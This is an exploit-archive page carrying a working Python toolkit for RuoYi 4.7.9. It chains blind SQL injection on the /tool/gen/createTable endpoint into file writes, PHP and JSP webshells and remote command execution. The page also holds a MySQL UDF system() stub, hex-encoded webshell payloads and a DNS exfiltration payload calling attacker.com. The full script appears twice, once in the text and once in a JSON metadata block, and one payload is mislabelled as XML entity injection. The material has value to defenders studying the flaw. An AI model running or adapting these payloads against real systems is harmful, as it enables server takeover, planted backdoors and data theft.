📄 RuoYi 4.7.9 Advanced SQL Injection Exploitation Toolkit_PACKETSTORM:215818

Description

This Python script is a sophisticated SQL injection exploitation tool that targets Java web applications specifically RuoYi framework, with additional remote code execution capabilities. The tool performs blind SQL injection attacks and includes...

Visit Original Source

Basic Information

ID PACKETSTORM:215818

Published Feb 18, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : RuoYi 4.7.9 Advanced SQL Injection Exploitation Toolkit with RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/yangzongzhuan/RuoYi |
=============================================================================================================================================

[+] Summary : This Python script is a sophisticated SQL injection exploitation tool that targets Java web applications (specifically RuoYi framework),
with additional Remote Code Execution (RCE) capabilities. The tool performs blind SQL injection attacks and includes multiple methods for escalating SQLi to full system compromise

[+] Technical Details:

Attack Vector: SQL injection in table creation endpoint (/tool/gen/createTable)

Injection Technique: Boolean-based blind with error-based fallback

Database: MySQL (uses MySQL-specific functions and syntax)

Payload Types: CREATE TABLE statements with conditional subqueries

Exploitation Chain: SQLi → File Write → Webshell → RCE

[+] POC : python poc.py

import requests
import argparse
import random
from concurrent.futures import ThreadPoolExecutor
from string import printable, ascii_lowercase, digits
from urllib3 import disable_warnings
disable_warnings()

PROXY_ENABLED = True
PROXY = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
} if PROXY_ENABLED else {}
CHARSET = printable

def send_request(payload):
global counter
cookies = {
'JSESSIONID': cookie,
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
data = f"sql={payload}"
resp = requests.post(url=url+'/tool/gen/createTable', data=data, cookies=cookies, headers=headers, verify=False, proxies=PROXY)
counter += 1
if "Operation successful" in resp.text:
return True
return False

def get_length_payload(value):
tablename = f"{random_string}_{counter}"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%0b111%20FROM%20sys_job%20WHERE%201%3d0%20AND%0bIF(length(%40%40version)%3d{value}%2c%201%2c%201%2f0)%3b"
return payload

def get_length():
for length in range(100):
payload = get_length_payload(length)
if send_request(payload=payload):
print(f'Data has {length} characters')
return length
return 0

def get_payload(location, value:int):
tablename = f"{random_string}_{counter}"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%0b111%20FROM%20sys_job%20WHERE%201%3d0%20AND%0bIF(ascii(substring((select%0b%40%40version)%2c{location}%2c1))%3d{value}%2c%201%2c%201%2f0)%3b"
return payload

def get_char(location):
for char in CHARSET:
payload = get_payload(location=location, value=ord(char))
if send_request(payload=payload):
print(f'Found character {char} at location {location}')
return char
return 'None'

def get_data():
length = get_length()
with ThreadPoolExecutor(max_workers=20) as tpe:
res_iter = tpe.map(get_char, range(1, length+1))
return ''.join(res_iter)

def test_file_write():
"""Testing file writing capabilities"""
test_paths = [
'/tmp/test_rce.txt',
'/var/www/html/test.php',
'C:\\Windows\\Temp\\test.txt',
'C:\\inetpub\\wwwroot\\test.php'
]

for path in test_paths:
clean_path = path.replace(' ', '')
tablename = f"{random_string}_rce_test"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%20'<?php%20phpinfo();%20?>'%20INTO%20OUTFILE%20'{clean_path}'"

print(f"[*] Testing file write to: {clean_path}")
if send_request(payload):
print(f"[+] File write Possible success to: {clean_path}")
return clean_path

return None

def execute_system_command(cmd):
"""Executing a system command using INTO OUTFILE و UDF"""

webshell_path = '/var/www/html/shell.php'

import base64
cmd_b64 = base64.b64encode(cmd.encode()).decode()

php_shell = f'''<?php
if(isset($_GET['cmd'])) {{
$cmd = base64_decode($_GET['cmd']);
echo "<pre>";
system($cmd);
echo "</pre>";
}}
?>'''

tablename = f"{random_string}_webshell"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_shell.encode().hex()}%20INTO%20OUTFILE%20'{webshell_path}'"

if send_request(payload):
print(f"[+] Webshell written to: {webshell_path}")
try:
shell_url = f"{url}/shell.php?cmd={cmd_b64}"
resp = requests.get(shell_url, verify=False, proxies=PROXY)
if resp.status_code == 200:
print("[+] Command output:")
print(resp.text[:500])
return resp.text
except:
pass

return None

def mysql_udf_rce():
"""RCE Using MySQL UDF"""
print("[*] Attempting MySQL UDF RCE...")

tablename = f"{random_string}_plugin_dir"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%20@@plugin_dir"

if send_request(payload):

plugin_dir = "/usr/lib/mysql/plugin/"

udf_payload = '''
#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count;
enum Item_result *arg_type;
char **args;
unsigned long *lengths;
char *maybe_null;
} UDF_ARGS;

typedef struct st_udf_init {
char maybe_null;
unsigned int decimals;
unsigned long max_length;
char *ptr;
char const_item;
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) {
if (args->arg_count != 1)
return 0;
system(args->args[0]);
return 0;
}
'''

return False

def java_jsp_shell():
"""Writing JSP shells for Java applications"""
jsp_shell = '''<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
<form method="post">
CMD: <input type="text" name="cmd" size="50">
<input type="submit">
</form>'''

jsp_paths = [
'/opt/tomcat/webapps/ROOT/cmd.jsp',
'/usr/local/tomcat/webapps/ROOT/shell.jsp',
'C:\\Program Files\\Apache Software Foundation\\Tomcat\\webapps\\ROOT\\cmd.jsp'
]

for path in jsp_paths:
tablename = f"{random_string}_jspshell"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%200x{jsp_shell.encode().hex()}%20INTO%20OUTFILE%20'{path}'"

if send_request(payload):
print(f"[+] JSP shell written to: {path}")
return path

return None

def rce_menu():
"""RCE Options List"""
print("\n" + "="*50)
print("RCE Exploitation Menu")
print("="*50)
print("1. Test file write capability")
print("2. Write PHP webshell")
print("3. Write JSP shell (Java)")
print("4. Execute system command")
print("5. Automated RCE chain")
print("6. Back to main menu")

choice = input("\nSelect option: ")

if choice == "1":
path = test_file_write()
if path:
print(f"[+] File write successful to: {path}")
else:
print("[-] File write failed")

elif choice == "2":
webshell_path = '/var/www/html/cmd.php'
php_code = '<?php system($_GET["cmd"]); ?>'

tablename = f"{random_string}_phpws"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_code.encode().hex()}%20INTO%20OUTFILE%20'{webshell_path}'"

if send_request(payload):
print(f"[+] PHP webshell written to: {webshell_path}")
print(f"[+] Access at: {url}/cmd.php?cmd=id")
else:
print("[-] Failed to write webshell")

elif choice == "3":
path = java_jsp_shell()
if path:
print(f"[+] Access shell at: {url}/shell.jsp")

elif choice == "4":
cmd = input("Enter command to execute: ")
result = execute_system_command(cmd)
if not result:
print("[-] Command execution failed")

elif choice == "5":
print("[*] Running automated RCE chain...")
print("[*] Step 1: Testing file write...")
write_path = test_file_write()

if write_path:
print(f"[+] Can write to: {write_path}")
print("[*] Step 2: Writing webshell...")

if '.php' in write_path:
php_code = '<?php echo shell_exec($_GET["cmd"]); ?>'
tablename = f"{random_string}_auto"
payload = f"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_code.encode().hex()}%20INTO%20OUTFILE%20'{write_path}'"

if send_request(payload):
print(f"[+] Webshell written successfully!")
print(f"[+] Test with: {url}/{'cmd.php' if 'cmd.php' in write_path else write_path.split('/')[-1]}?cmd=id")

elif '.jsp' in write_path:
java_jsp_shell()
else:
print("[-] Automated chain failed at step 1")

def init():
parser = argparse.ArgumentParser(description='SQLi PoC with RCE')
parser.add_argument('-u','--url',help='Target url', required=True, type=str)
parser.add_argument('-c','--cookie',help='JSESSIONID cookie value', required=True, type=str)
parser.add_argument('--rce', help='Enable RCE mode', action='store_true')
return parser.parse_args()

if __name__ == '__main__':
args = init()
url = args.url
cookie = args.cookie
counter = 0
random_string = ''.join(random.choices(ascii_lowercase + digits, k=6))

if args.rce:
rce_menu()
else:
print('Data: ', get_data())

Additional RCE Loading Options:

1. Direct Webshell Writing:

# PHP Webshell

payload = "CREATE%20table%20test%20as%20SELECT%200x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e%20INTO%20OUTFILE%20'/var/www/html/shell.php'"

# JSP Webshell

payload = "CREATE%20table%20test%20as%20SELECT%200x3c25406672616765207061676520696d706f72743d226a6176612e696f2e2a2c 6a6176612e7574696c2e2a22253e3c25696628726571756573742e676574506172616d657465722822632229213d6e756c6c297b5 0726f6365737320703d52756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d65 7465722822632229293b42756666657265645265616465722062693d6e6577204275666665726564526561646572286e657720496e 70757453747265616d52656164657228702e676574496e70757453747265616d282929293b537472696e67206c696e653b7768696 c6528286c696e653d62692e726561644c696e65282929213d6e756c6c297b6f75742e7072696e746c6e286c696e65293b7d7d253e 3c666f726d206d6574686f643d22504f5354223e3c696e70757420747970653d227465787422206e616d653d2263223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e%20INTO%20OUTFILE%20'/opt/tomcat/webapps/ROOT/cmd.jsp'"

2. Executing actions via DNS extraction:

payload = "CREATE%20table%20test%20as%20SELECT%20LOAD_FILE(CONCAT('\\\\\\\\',(SELECT%20@@version),'.attacker.com\\\\test'))"

3. Using an external XML entity:

payload = "CREATE%20table%20test%20as%20SELECT%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))"

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-18T17:33:34",
    "description": "This Python script is a sophisticated SQL injection exploitation tool that targets Java web applications specifically RuoYi framework, with additional remote code execution capabilities. The tool performs blind SQL injection attacks and includes...",
    "published": "2026-02-18T00:00:00",
    "modified": "2026-02-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 RuoYi 4.7.9 Advanced SQL Injection Exploitation Toolkit",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215818",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : RuoYi 4.7.9 Advanced SQL Injection Exploitation Toolkit with RCE                                                            |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://github.com/yangzongzhuan/RuoYi                                                                                      |\n    =============================================================================================================================================\n    \n    [+] Summary    : This Python script is a sophisticated SQL injection exploitation tool that targets Java web applications (specifically RuoYi framework), \n                     with additional Remote Code Execution (RCE) capabilities. The tool performs blind SQL injection attacks and includes multiple methods for escalating SQLi to full system compromise\n    \n    [+] Technical Details:\n    \n        Attack Vector: SQL injection in table creation endpoint (/tool/gen/createTable)\n    \n        Injection Technique: Boolean-based blind with error-based fallback\n    \n        Database: MySQL (uses MySQL-specific functions and syntax)\n    \n        Payload Types: CREATE TABLE statements with conditional subqueries\n    \n        Exploitation Chain: SQLi \u2192 File Write \u2192 Webshell \u2192 RCE\n    \t\n    [+] POC : python poc.py\n    \n    import requests\n    import argparse\n    import random\n    from concurrent.futures import ThreadPoolExecutor\n    from string import printable, ascii_lowercase, digits\n    from urllib3 import disable_warnings\n    disable_warnings()\n    \n    \n    PROXY_ENABLED = True\n    PROXY = {\n        'http': 'http://127.0.0.1:8080',\n        'https': 'http://127.0.0.1:8080'\n    } if PROXY_ENABLED else {}\n    CHARSET = printable\n    \n    def send_request(payload):\n        global counter\n        cookies = {\n            'JSESSIONID': cookie,\n        }\n        headers = {\n            'Content-Type': 'application/x-www-form-urlencoded'\n        }\n        data = f\"sql={payload}\"\n        resp = requests.post(url=url+'/tool/gen/createTable', data=data, cookies=cookies, headers=headers, verify=False, proxies=PROXY)\n        counter += 1\n        if \"Operation successful\" in resp.text:\n            return True\n        return False\n    \n    def get_length_payload(value):\n        tablename = f\"{random_string}_{counter}\"\n        payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%0b111%20FROM%20sys_job%20WHERE%201%3d0%20AND%0bIF(length(%40%40version)%3d{value}%2c%201%2c%201%2f0)%3b\"\n        return payload\n    \n    def get_length():\n        for length in range(100):\n            payload = get_length_payload(length)\n            if send_request(payload=payload):\n                print(f'Data has {length} characters')\n                return length\n        return 0\n    \n    def get_payload(location, value:int):\n        tablename = f\"{random_string}_{counter}\"\n        payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%0b111%20FROM%20sys_job%20WHERE%201%3d0%20AND%0bIF(ascii(substring((select%0b%40%40version)%2c{location}%2c1))%3d{value}%2c%201%2c%201%2f0)%3b\"\n        return payload\n    \n    def get_char(location):\n        for char in CHARSET:\n            payload = get_payload(location=location, value=ord(char))\n            if send_request(payload=payload):\n                print(f'Found character {char} at location {location}')\n                return char\n        return 'None'\n    \n    def get_data():\n        length = get_length()\n        with ThreadPoolExecutor(max_workers=20) as tpe:\n            res_iter = tpe.map(get_char, range(1, length+1))\n        return ''.join(res_iter)\n    \n    def test_file_write():\n        \"\"\"Testing file writing capabilities\"\"\"\n        test_paths = [\n            '/tmp/test_rce.txt',\n            '/var/www/html/test.php',\n            'C:\\\\Windows\\\\Temp\\\\test.txt',\n            'C:\\\\inetpub\\\\wwwroot\\\\test.php'\n        ]\n        \n        for path in test_paths:\n            clean_path = path.replace(' ', '')\n            tablename = f\"{random_string}_rce_test\"\n            payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%20'<?php%20phpinfo();%20?>'%20INTO%20OUTFILE%20'{clean_path}'\"\n            \n            print(f\"[*] Testing file write to: {clean_path}\")\n            if send_request(payload):\n                print(f\"[+] File write Possible success to: {clean_path}\")\n                return clean_path\n        \n        return None\n    \n    def execute_system_command(cmd):\n        \"\"\"Executing a system command using INTO OUTFILE \u0648 UDF\"\"\"\n    \n        webshell_path = '/var/www/html/shell.php'\n    \n        import base64\n        cmd_b64 = base64.b64encode(cmd.encode()).decode()\n        \n        php_shell = f'''<?php\n        if(isset($_GET['cmd'])) {{\n            $cmd = base64_decode($_GET['cmd']);\n            echo \"<pre>\";\n            system($cmd);\n            echo \"</pre>\";\n        }}\n        ?>'''\n        \n        tablename = f\"{random_string}_webshell\"\n        payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_shell.encode().hex()}%20INTO%20OUTFILE%20'{webshell_path}'\"\n        \n        if send_request(payload):\n            print(f\"[+] Webshell written to: {webshell_path}\")\n            try:\n                shell_url = f\"{url}/shell.php?cmd={cmd_b64}\"\n                resp = requests.get(shell_url, verify=False, proxies=PROXY)\n                if resp.status_code == 200:\n                    print(\"[+] Command output:\")\n                    print(resp.text[:500]) \n                    return resp.text\n            except:\n                pass\n        \n        return None\n    \n    def mysql_udf_rce():\n        \"\"\"RCE Using MySQL UDF\"\"\"\n        print(\"[*] Attempting MySQL UDF RCE...\")\n    \n        tablename = f\"{random_string}_plugin_dir\"\n        payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%20@@plugin_dir\"\n        \n        if send_request(payload):\n    \n            plugin_dir = \"/usr/lib/mysql/plugin/\"  \n    \n            udf_payload = '''\n            #include <stdio.h>\n            #include <stdlib.h>\n            \n            enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};\n            typedef struct st_udf_args {\n                unsigned int arg_count;\n                enum Item_result *arg_type;\n                char **args;\n                unsigned long *lengths;\n                char *maybe_null;\n            } UDF_ARGS;\n            \n            typedef struct st_udf_init {\n                char maybe_null;\n                unsigned int decimals;\n                unsigned long max_length;\n                char *ptr;\n                char const_item;\n            } UDF_INIT;\n            \n            int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) {\n                if (args->arg_count != 1)\n                    return 0;\n                system(args->args[0]);\n                return 0;\n            }\n            '''\n            \n    \n        return False\n    \n    def java_jsp_shell():\n        \"\"\"Writing JSP shells for Java applications\"\"\"\n        jsp_shell = '''<%@ page import=\"java.util.*,java.io.*\"%>\n    <%\n    if (request.getParameter(\"cmd\") != null) {\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n            out.println(disr);\n            disr = dis.readLine();\n        }\n    }\n    %>\n    <form method=\"post\">\n    CMD: <input type=\"text\" name=\"cmd\" size=\"50\">\n    <input type=\"submit\">\n    </form>'''\n    \n        jsp_paths = [\n            '/opt/tomcat/webapps/ROOT/cmd.jsp',\n            '/usr/local/tomcat/webapps/ROOT/shell.jsp',\n            'C:\\\\Program Files\\\\Apache Software Foundation\\\\Tomcat\\\\webapps\\\\ROOT\\\\cmd.jsp'\n        ]\n        \n        for path in jsp_paths:\n            tablename = f\"{random_string}_jspshell\"\n            payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%200x{jsp_shell.encode().hex()}%20INTO%20OUTFILE%20'{path}'\"\n            \n            if send_request(payload):\n                print(f\"[+] JSP shell written to: {path}\")\n                return path\n        \n        return None\n    \n    def rce_menu():\n        \"\"\"RCE Options List\"\"\"\n        print(\"\\n\" + \"=\"*50)\n        print(\"RCE Exploitation Menu\")\n        print(\"=\"*50)\n        print(\"1. Test file write capability\")\n        print(\"2. Write PHP webshell\")\n        print(\"3. Write JSP shell (Java)\")\n        print(\"4. Execute system command\")\n        print(\"5. Automated RCE chain\")\n        print(\"6. Back to main menu\")\n        \n        choice = input(\"\\nSelect option: \")\n        \n        if choice == \"1\":\n            path = test_file_write()\n            if path:\n                print(f\"[+] File write successful to: {path}\")\n            else:\n                print(\"[-] File write failed\")\n        \n        elif choice == \"2\":\n            webshell_path = '/var/www/html/cmd.php'\n            php_code = '<?php system($_GET[\"cmd\"]); ?>'\n            \n            tablename = f\"{random_string}_phpws\"\n            payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_code.encode().hex()}%20INTO%20OUTFILE%20'{webshell_path}'\"\n            \n            if send_request(payload):\n                print(f\"[+] PHP webshell written to: {webshell_path}\")\n                print(f\"[+] Access at: {url}/cmd.php?cmd=id\")\n            else:\n                print(\"[-] Failed to write webshell\")\n        \n        elif choice == \"3\":\n            path = java_jsp_shell()\n            if path:\n                print(f\"[+] Access shell at: {url}/shell.jsp\")\n        \n        elif choice == \"4\":\n            cmd = input(\"Enter command to execute: \")\n            result = execute_system_command(cmd)\n            if not result:\n                print(\"[-] Command execution failed\")\n        \n        elif choice == \"5\":\n            print(\"[*] Running automated RCE chain...\")\n            print(\"[*] Step 1: Testing file write...\")\n            write_path = test_file_write()\n            \n            if write_path:\n                print(f\"[+] Can write to: {write_path}\")\n                print(\"[*] Step 2: Writing webshell...\")\n                \n                if '.php' in write_path:\n                    php_code = '<?php echo shell_exec($_GET[\"cmd\"]); ?>'\n                    tablename = f\"{random_string}_auto\"\n                    payload = f\"CREATE%20table%20{tablename}%20as%20SELECT%200x{php_code.encode().hex()}%20INTO%20OUTFILE%20'{write_path}'\"\n                    \n                    if send_request(payload):\n                        print(f\"[+] Webshell written successfully!\")\n                        print(f\"[+] Test with: {url}/{'cmd.php' if 'cmd.php' in write_path else write_path.split('/')[-1]}?cmd=id\")\n                \n                elif '.jsp' in write_path:\n                    java_jsp_shell()\n            else:\n                print(\"[-] Automated chain failed at step 1\")\n    \n    def init():\n        parser = argparse.ArgumentParser(description='SQLi PoC with RCE')\n        parser.add_argument('-u','--url',help='Target url', required=True, type=str)\n        parser.add_argument('-c','--cookie',help='JSESSIONID cookie value', required=True, type=str)\n        parser.add_argument('--rce', help='Enable RCE mode', action='store_true')\n        return parser.parse_args()\n    \n    if __name__ == '__main__':\n        args = init()\n        url = args.url\n        cookie = args.cookie\n        counter = 0\n        random_string = ''.join(random.choices(ascii_lowercase + digits, k=6))\n        \n        if args.rce:\n            rce_menu()\n        else:\n            print('Data: ', get_data())\n    \t\t\n    Additional RCE Loading Options:\n    \n    1. Direct Webshell Writing:\n    \n    \n    \n    # PHP Webshell\n    \n    payload = \"CREATE%20table%20test%20as%20SELECT%200x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e%20INTO%20OUTFILE%20'/var/www/html/shell.php'\"\n    \n    # JSP Webshell\n    \n    payload = \"CREATE%20table%20test%20as%20SELECT%200x3c25406672616765207061676520696d706f72743d226a6176612e696f2e2a2c 6a6176612e7574696c2e2a22253e3c25696628726571756573742e676574506172616d657465722822632229213d6e756c6c297b5 0726f6365737320703d52756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d65 7465722822632229293b42756666657265645265616465722062693d6e6577204275666665726564526561646572286e657720496e 70757453747265616d52656164657228702e676574496e70757453747265616d282929293b537472696e67206c696e653b7768696 c6528286c696e653d62692e726561644c696e65282929213d6e756c6c297b6f75742e7072696e746c6e286c696e65293b7d7d253e 3c666f726d206d6574686f643d22504f5354223e3c696e70757420747970653d227465787422206e616d653d2263223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e%20INTO%20OUTFILE%20'/opt/tomcat/webapps/ROOT/cmd.jsp'\"\n    \n    2. Executing actions via DNS extraction:\n    \n    payload = \"CREATE%20table%20test%20as%20SELECT%20LOAD_FILE(CONCAT('\\\\\\\\\\\\\\\\',(SELECT%20@@version),'.attacker.com\\\\\\\\test'))\"\n    \n    3. Using an external XML entity:\n    \n    payload = \"CREATE%20table%20test%20as%20SELECT%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20@@version),0x7e))\"\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215818",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215818/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply